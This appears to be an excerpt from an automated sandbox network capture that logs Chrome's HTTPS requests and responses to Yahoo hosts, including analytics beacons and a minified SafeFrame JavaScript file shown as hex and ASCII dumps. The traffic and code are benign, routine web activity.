                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 28 7b 62 6f 74 74 6f 6d 3a 64 2c 6c 65 66 74 3a 72 2c 72 69 67 68 74 3a 61 2c 74 6f 70 3a 63 7d 2c 74 29 29 7b 63 6f 6e 73 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 7b 74 6f 70 3a 69 2c 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 7d 3d 65 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 6f 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 69 7d 2c 74 2c 22 75 70 22 29 2c 61 3d 6f 74 28 7b 62 6f 74 74 6f 6d 3a 73 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d 2c 74 2c 22 64 6f 77 6e 22 29 2c 63 3d 6f 74 28 7b 62 6f 74 74 6f 6d 3a 61 2c 6c 65 66 74 3a 6f 2c 72 69 67 68 74 3a 72 2c 74 6f 70 3a 65 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eturn!0}return!1}({bottom:d,left:r,right:a,top:c},t)){const e=function(e,t,n){const{top:i,bottom:s,left:o,right:r}=e;try{const e=ot({bottom:s,left:o,right:r,top:i},t,"up"),a=ot({bottom:s,left:o,right:r,top:e},t,"down"),c=ot({bottom:a,left:o,right:r,top:e}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              67192.168.2.45108887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1429OUTGET /_td_api/beacon/performance?ybar-init_0=0.5&ybar-mod-sidenav_0=1.5&ybar-mod-logo_0=0.20000000001164153&ybar-mod-searchbox_0=0.6000000000058208&ybar-mod-assistjs_0=2.7999999999883585&ybar-mod-adaptivenav_0=0.20000000001164153&ybar-account-init_0=0.7000000000116415&ybar-mail-init_0=1&ybar-mod-navigation_0=9.5&ybar-mod-notification_0=0.1999999999825377&src=ybar&_rdn=814283&apptype=default&rid=1fkbtbdjgb12s&bucket=rocket_GA_desk_test-3-v1%2Cseamless&device=desktop&osName=windows%20nt&browserName=chrome&browserVersion=117.0&site=homepage HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC589INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-security-policy-report-only: default-src 'self'; report-uri https://csp.yahoo.com/beacon/csp?src=fendr_beaconeater.media.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              68192.168.2.451092188.125.72.1394431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1074OUTPOST /v2/public/yql?yhlVer=2&yhlClient=rapid&yhlS=2023538075&yhlCT=2&yhlBTMS=1728414815321&yhlClientVer=3.54.3&yhlRnd=mI2SdHB7LcTgujXG&yhlCompressed=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: udc.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC13640OUTData Raw: 71 3d 73 65 6c 65 63 74 25 32 30 2a 25 32 30 66 72 6f 6d 25 32 30 78 25 32 30 77 68 65 72 65 25 32 30 61 25 32 30 25 33 44 25 32 30 27 25 37 42 25 32 32 62 70 25 32 32 25 33 41 25 37 42 25 32 32 5f 61 31 73 25 32 32 25 33 41 25 32 32 64 25 33 44 41 51 41 42 42 46 79 45 42 57 63 43 45 43 77 45 33 5f 61 69 70 61 52 75 6e 47 55 38 57 66 6f 59 34 47 73 46 45 67 45 42 41 51 48 56 42 6d 63 50 5a 39 78 53 30 69 4d 41 5f 65 4d 41 41 41 25 32 36 53 25 33 44 41 51 41 41 41 68 4f 39 4e 69 54 4c 79 78 33 66 44 44 51 39 31 4b 32 30 51 31 6f 25 32 32 25 32 43 25 32 32 5f 70 6c 25 32 32 25 33 41 25 32 32 31 25 32 32 25 32 43 25 32 32 41 5f 76 25 32 32 25 33 41 25 32 32 33 2e 35 34 2e 33 25 32 32 25 32 43 25 32 32 41 5f 63 6e 25 32 32 25 33 41 25 32 32 41 4e 41 4c 59 54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: q=select%20*%20from%20x%20where%20a%20%3D%20'%7B%22bp%22%3A%7B%22_a1s%22%3A%22d%3DAQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA%26S%3DAQAAAhO9NiTLyx3fDDQ91K20Q1o%22%2C%22_pl%22%3A%221%22%2C%22A_v%22%3A%223.54.3%22%2C%22A_cn%22%3A%22ANALYT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC591INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: no-store, no-cache, private, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              p3p: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              69192.168.2.45108987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC535OUTGET /uc/sf/0.1.434/js/safe.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC692INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: xCttpfUSS1Cjbu4GN/NqVomzG/hP1be7Jq2M7XugntZT1KNchG4HLXxziX6InS04Ac2dq+aGGFE=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 8TKNQT9NTMDNR671
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 06 Oct 2024 15:08:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 25 Apr 2024 19:26:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "60f19ca2f094acabba5b7988467387c4"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 77851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 187519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 2f 2a 21 20 53 41 46 45 46 52 41 4d 45 20 30 2e 31 2e 34 33 34 20 c2 a9 20 32 30 32 34 2c 20 59 61 68 6f 6f 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 39 34 36 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 28 65 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 7b 7d 3a 65 29 2e 63 6c 6f 73 65 3d 7b 6e 61 6d 65 3a 22 63 6c 6f 73 65 22 2c 68 65 69 67 68 74 3a 34 38 2c 77 69 64 74 68 3a 34 38 2c 70 61 74 68 3a 22 4d 33 37 2e 39 38 20 33 34 2e 38 32 37 6c 2d 39 2e 39 2d 39 2e 39 20 39 2e 39 2d 39 2e 38 39 38 63 2e 37 38 2d 2e 37 38 32 2e 37 38 2d 32 2e 30 35 20 30 2d 32 2e 38 33 2d 2e 37 38 2d 2e 37 38 2d 32 2e 30 34 37 2d 2e 37 38 2d 32 2e 38 32 38 20 30 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /*! SAFEFRAME 0.1.434 2024, Yahoo Inc. All rights reserved. */!function(){var t={9466:function(t){var e;(e=void 0===e?{}:e).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 3a 6e 2e 63 6f 6f 6b 69 65 73 3b 69 66 28 6e 3d 63 28 6e 29 2c 65 3d 65 7c 7c 7b 7d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 6e 2e 65 72 72 6f 72 28 5b 22 43 6f 6f 6b 69 65 3a 3a 67 65 74 20 2d 20 69 6e 76 61 6c 69 64 20 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 74 2c 6f 70 74 73 3a 65 7d 2c 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 5d 2e 6a 6f 69 6e 28 22 5c 6e 22 29 29 2c 6e 75 6c 6c 3b 76 61 72 20 73 3d 72 5b 74 5d 3b 72 65 74 75 72 6e 20 65 2e 6a 73 6f 6e 26 26 73 26 26 28 73 3d 69 28 73 29 29 2c 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 2c 65 2c 6e 29 7b 65 3d 65 7c 7c 7b 7d 3b 76 61 72 20 72 3d 66 28 74 2c 6e 75 6c 6c 2c 6e 29 3b 69 66 28 22 73 74 72 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :n.cookies;if(n=c(n),e=e||{},"string"!=typeof t)return n.error(["Cookie::get - invalid input",{name:t,opts:e},(new Error).stack].join("\n")),null;var s=r[t];return e.json&&s&&(s=i(s)),void 0!==s?s:null}function p(t,e,n){e=e||{};var r=f(t,null,n);if("strin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 6f 6e 29 2c 72 2e 6a 73 6f 6e 3d 21 31 2c 68 28 74 2c 69 2c 72 29 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 73 65 74 53 75 62 73 3d 68 7d 2c 33 32 31 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3b 74 72 79 7b 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 64 69 72 26 26 63 6f 6e 73 6f 6c 65 2e 64 69 72 28 74 29 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 7b 7d 3a 65 7d 72 65 74 75 72 6e 20 6e 7d 7d 2c 33 39 34 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: on),r.json=!1,h(t,i,r)},t.exports.setSubs=h},3215:function(t){"use strict";t.exports=function(t,e){var n;try{n=JSON.parse(t)}catch(t){console&&console.dir&&console.dir(t),n=void 0===e?{}:e}return n}},3945:function(t){"use strict";t.exports=function(t,e){v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 74 28 6f 2e 70 61 74 68 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 70 61 74 68 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 50 61 74 68 3d 22 2b 6f 2e 70 61 74 68 7d 6f 2e 65 78 70 69 72 65 73 26 26 28 63 2b 3d 22 3b 20 45 78 70 69 72 65 73 3d 22 2b 6f 2e 65 78 70 69 72 65 73 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 29 3b 6f 2e 68 74 74 70 4f 6e 6c 79 26 26 28 63 2b 3d 22 3b 20 48 74 74 70 4f 6e 6c 79 22 29 3b 6f 2e 73 65 63 75 72 65 26 26 28 63 2b 3d 22 3b 20 53 65 63 75 72 65 22 29 3b 6f 2e 66 69 72 73 74 50 61 72 74 79 4f 6e 6c 79 26 26 28 63 2b 3d 22 3b 20 46 69 72 73 74 2d 50 61 72 74 79 2d 4f 6e 6c 79 22 29 3b 72 65 74 75 72 6e 20 63 7d 3b 76 61 72 20 6e 3d 64 65 63 6f 64 65 55 52 49 43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t(o.path))throw new TypeError("option path is invalid");c+="; Path="+o.path}o.expires&&(c+="; Expires="+o.expires.toUTCString());o.httpOnly&&(c+="; HttpOnly");o.secure&&(c+="; Secure");o.firstPartyOnly&&(c+="; First-Party-Only");return c};var n=decodeURIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 36 30 38 30 29 2c 6f 3d 6e 28 39 35 36 35 29 2c 69 3d 6e 28 38 39 38 31 29 2c 73 3d 6e 28 36 33 31 39 29 2c 61 3d 6e 28 34 32 30 39 29 2c 63 3d 6e 28 33 35 31 37 29 2c 75 3d 6e 28 36 31 39 38 29 2c 6c 3d 6e 28 34 36 35 39 29 2c 66 3d 6e 28 38 31 29 2c 70 3d 6e 28 38 35 31 29 2c 68 3d 41 72 72 61 79 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 69 28 74 29 2c 6e 3d 63 28 74 68 69 73 29 2c 64 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6d 3d 64 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 2c 76 3d 76 6f 69 64 20 30 21 3d 3d 6d 3b 76 26 26 28 6d 3d 72 28 6d 2c 64 3e 32 3f 61 72 67 75 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tion(t,e,n){"use strict";var r=n(6080),o=n(9565),i=n(8981),s=n(6319),a=n(4209),c=n(3517),u=n(6198),l=n(4659),f=n(81),p=n(851),h=Array;t.exports=function(t){var e=i(t),n=c(this),d=arguments.length,m=d>1?arguments[1]:void 0,v=void 0!==m;v&&(m=r(m,d>2?argume
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 35 35 31 29 2c 6f 3d 6e 28 39 35 33 39 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 69 3f 65 28 72 28 6e 29 5b 30 5d 2c 6e 5b 31 5d 29 3a 65 28 6e 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 74 2c 22 74 68 72 6f 77 22 2c 65 29 7d 7d 7d 2c 34 35 37 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 35 30 34 29 2c 6f 3d 72 28 7b 7d 2e 74 6f 53 74 72 69 6e 67 29 2c 69 3d 72 28 22 22 2e 73 6c 69 63 65 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 69 28 6f 28 74 29 2c 38 2c 2d 31 29 7d 7d 2c 36 39 35 35 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: strict";var r=n(8551),o=n(9539);t.exports=function(t,e,n,i){try{return i?e(r(n)[0],n[1]):e(n)}catch(e){o(t,"throw",e)}}},4576:function(t,e,n){"use strict";var r=n(9504),o=r({}.toString),i=r("".slice);t.exports=function(t){return i(o(t),8,-1)}},6955:functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 3a 21 28 32 26 74 29 2c 77 72 69 74 61 62 6c 65 3a 21 28 34 26 74 29 2c 76 61 6c 75 65 3a 65 7d 7d 7d 2c 34 36 35 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 33 37 32 34 29 2c 6f 3d 6e 28 34 39 31 33 29 2c 69 3d 6e 28 36 39 38 30 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 3f 6f 2e 66 28 74 2c 65 2c 69 28 30 2c 6e 29 29 3a 74 5b 65 5d 3d 6e 7d 7d 2c 32 31 30 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 38 33 29 2c 6f 3d 6e 28 34 39 31 33 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 74 26 26 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :!(2&t),writable:!(4&t),value:e}}},4659:function(t,e,n){"use strict";var r=n(3724),o=n(4913),i=n(6980);t.exports=function(t,e,n){r?o.f(t,e,i(0,n)):t[e]=n}},2106:function(t,e,n){"use strict";var r=n(283),o=n(4913);t.exports=function(t,e,n){return n.get&&r(
